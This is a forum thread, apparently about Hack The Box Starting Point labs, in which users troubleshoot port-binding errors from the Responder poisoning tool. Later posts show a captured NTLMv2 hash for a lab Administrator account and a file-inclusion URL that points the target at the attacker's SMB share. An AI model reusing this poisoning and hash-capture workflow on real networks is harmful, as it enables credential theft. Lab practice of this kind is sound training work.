Responder Tool issue - Starting Point

Has anyone faced similar issues with the Responder tool when doing the labs? Not able to listen to any traffic using port 5985… Any suggestion on what I can do? Thanks in advance!

[!] Error starting UDP server on port 5355, check permissions or other servers running.
[!] Error starting UDP server on port 5353, check permissions or other servers running.
[!] Error starting SSL server on port 5986, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.

First step: Check if any other process (server or client) uses the ports.

ss --udp --tcp --listen --process

Second: For using port 443 (a port of the first 1024) you need root permission. So typically a sudo or a su command is needed.

I’m having the same issue, but only for ports 443 and 5986. It’s being run with sudo and your suggestion along with

sudo netstat -antp

hasn’t shown anything bound to either port.

On my local box with Parrot OS 5.0 the responder 3.0.6.0 is installed by default.

As root I can start the Responder Python script:

$ responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

... cut some lines here ...

[!] Error starting TCP server on port 3389, check permissions or other servers running.

[+] Listening for events...

The server at port 3389 could not be started by the responder script.

I checked it:

$ ss --tcp --udp --listen --numeric --process
Netid  State   Recv-Q  Send-Q  Local Address:Port                      Peer Address:Port  Process
udp    UNCONN  0       0       0.0.0.0:53294                           0.0.0.0:*          users:(("openvpn",pid=2759,fd=3))
udp    UNCONN  0       0       [fe80::2afa:9bca:c24f:4f39]%enp1s0:546  [::]:*             users:(("NetworkManager",pid=454,fd=24))
tcp    LISTEN  0       2       [::1]:3350                              [::]:*             users:(("xrdp-sesman",pid=712,fd=7))
tcp    LISTEN  0       2       *:3389                                  *:*                users:(("xrdp",pid=729,fd=11))

OK. Port 3389 is already used by the xrdp server, so Responder cannot use this port.
The openvpn process opens the UDP port when I am connected to the HTB lab via openvpn. This port is at least open if I am connected from my local box to HTB.

On my local Parrot OS box the responder in the default installation works plausibly.

1 Like
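
Added example, not part of any post in this thread: the two checks suggested above (is another process bound to the port, and is it a privileged port) applied to Responder's startup errors and `ss` output. The error lines and `ss` rows are taken from the posts above with whitespace condensed; the function names and verdict strings are this example's own.

```python
import re

# Responder startup errors quoted in this thread.
RESPONDER_LOG = """\
[!] Error starting TCP server on port 3389, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[!] Error starting SSL server on port 5986, check permissions or other servers running.
"""
# `ss --tcp --udp --listen --numeric --process` rows from the post above,
# whitespace condensed.
SS_OUTPUT = """\
udp UNCONN 0 0 0.0.0.0:53294 0.0.0.0:* users:(("openvpn",pid=2759,fd=3))
tcp LISTEN 0 2 [::1]:3350 [::]:* users:(("xrdp-sesman",pid=712,fd=7))
tcp LISTEN 0 2 *:3389 *:* users:(("xrdp",pid=729,fd=11))
"""
ERR_RE = re.compile(r"Error starting (\w+) server on port (\d+)")
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')

def failed_ports(log):
    """(proto, port) pairs Responder could not bind; its SSL servers are TCP."""
    return {("udp" if kind == "UDP" else "tcp", int(port))
            for kind, port in ERR_RE.findall(log)}

def listeners(ss_text):
    """Map (proto, port) -> [(process, pid), ...] for every listening socket."""
    table = {}
    for line in ss_text.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] not in ("tcp", "udp"):
            continue
        port = cols[4].rsplit(":", 1)[-1]
        if port.isdigit():
            owners = [(name, int(pid)) for name, pid in PROC_RE.findall(line)]
            table.setdefault((cols[0], int(port)), []).extend(owners)
    return table

def diagnose(log, ss_text):
    """Say, per failed port, which of the two causes in the error applies."""
    held, report = listeners(ss_text), {}
    for key in sorted(failed_ports(log)):
        if key in held:
            names = ", ".join(f"{n} (pid {p})" for n, p in held[key])
            report[key] = "in use by " + (names or "unknown process (run ss as root)")
        elif key[1] < 1024:
            report[key] = "free, but privileged: binding needs root"
        else:
            report[key] = "free and unprivileged: look for another cause"
    return report

if __name__ == "__main__":
    for (proto, port), verdict in diagnose(RESPONDER_LOG, SS_OUTPUT).items():
        print(f"{proto}/{port}: {verdict}")
```

The verdicts only reflect the `ss` snapshot passed in; capture it as root so the process column is populated.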

When playing around I think I solved it for myself at least. I had installed it manually on Kali and when heading to the install directory and calling

sudo python3 responder.py -I tun0

it fails, but while fumbling around I found the default install that I was sure existed already before heading to GitHub, and simply calling

sudo responder -I tun0

works fine.

Hopefully that’ll help the OP.

1 Like

You have to turn off the HTTP server in Responder.conf and run the Responder. The answer is shown in this video starting from minute 8.

For those on Mac, if the only two ports giving errors are 5355 and 5353 then you can disregard these ports. These ports are used for Bonjour, SharePlay, etc., and did not stop me from grabbing the hash statement from the website.

Side note: statement to get into Responder looks a tad different than those using Linux and Windows:

sudo python3 Responder.py -i {IP address of StartingPoint VPN}

I am on Kali Linux and have the same problem with ports 5355 and 5353. How is it possible to disable/fix this issue? I am using sudo and the ports are not blocked by other programs.

What are the statements you used?

I face the same error for ports 443 and 5986, however. Even then I got the hash:

[!] Error starting SSL server on port 443, check permissions or other servers running.
[!] Error starting SSL server on port 5986, check permissions or other servers running.
[SMB] NTLMv2-SSP Client : 10.129.198.114
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:d34c4a93c7d69f80:EC6FE89AF6E6DB424ED02AABAB541464:010100000000000000216223103BDA016B4659E75FE781B000000000020008004A00360054004A0001001E00570049004E002D004C00520053005600380039005400310036004B004B0004003400570049004E002D004C00520053005600380039005400310036004B004B002E004A00360054004A002E004C004F00430041004C00030014004A00360054004A002E004C004F00430041004C00050014004A00360054004A002E004C004F00430041004C000700080000216223103BDA010600040002000000080030003000000000000000010000000020000078834C01C49616C0FE27D604084236CC194C585BE58D152BEF05A7478A8EE5A40A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E003100330031000000000000000000
I only set the responder IP correctly here: http://unika.htb/?page=//10.10.16.131/somefile

Thanks, this works for me!!

sudo responder -I tun0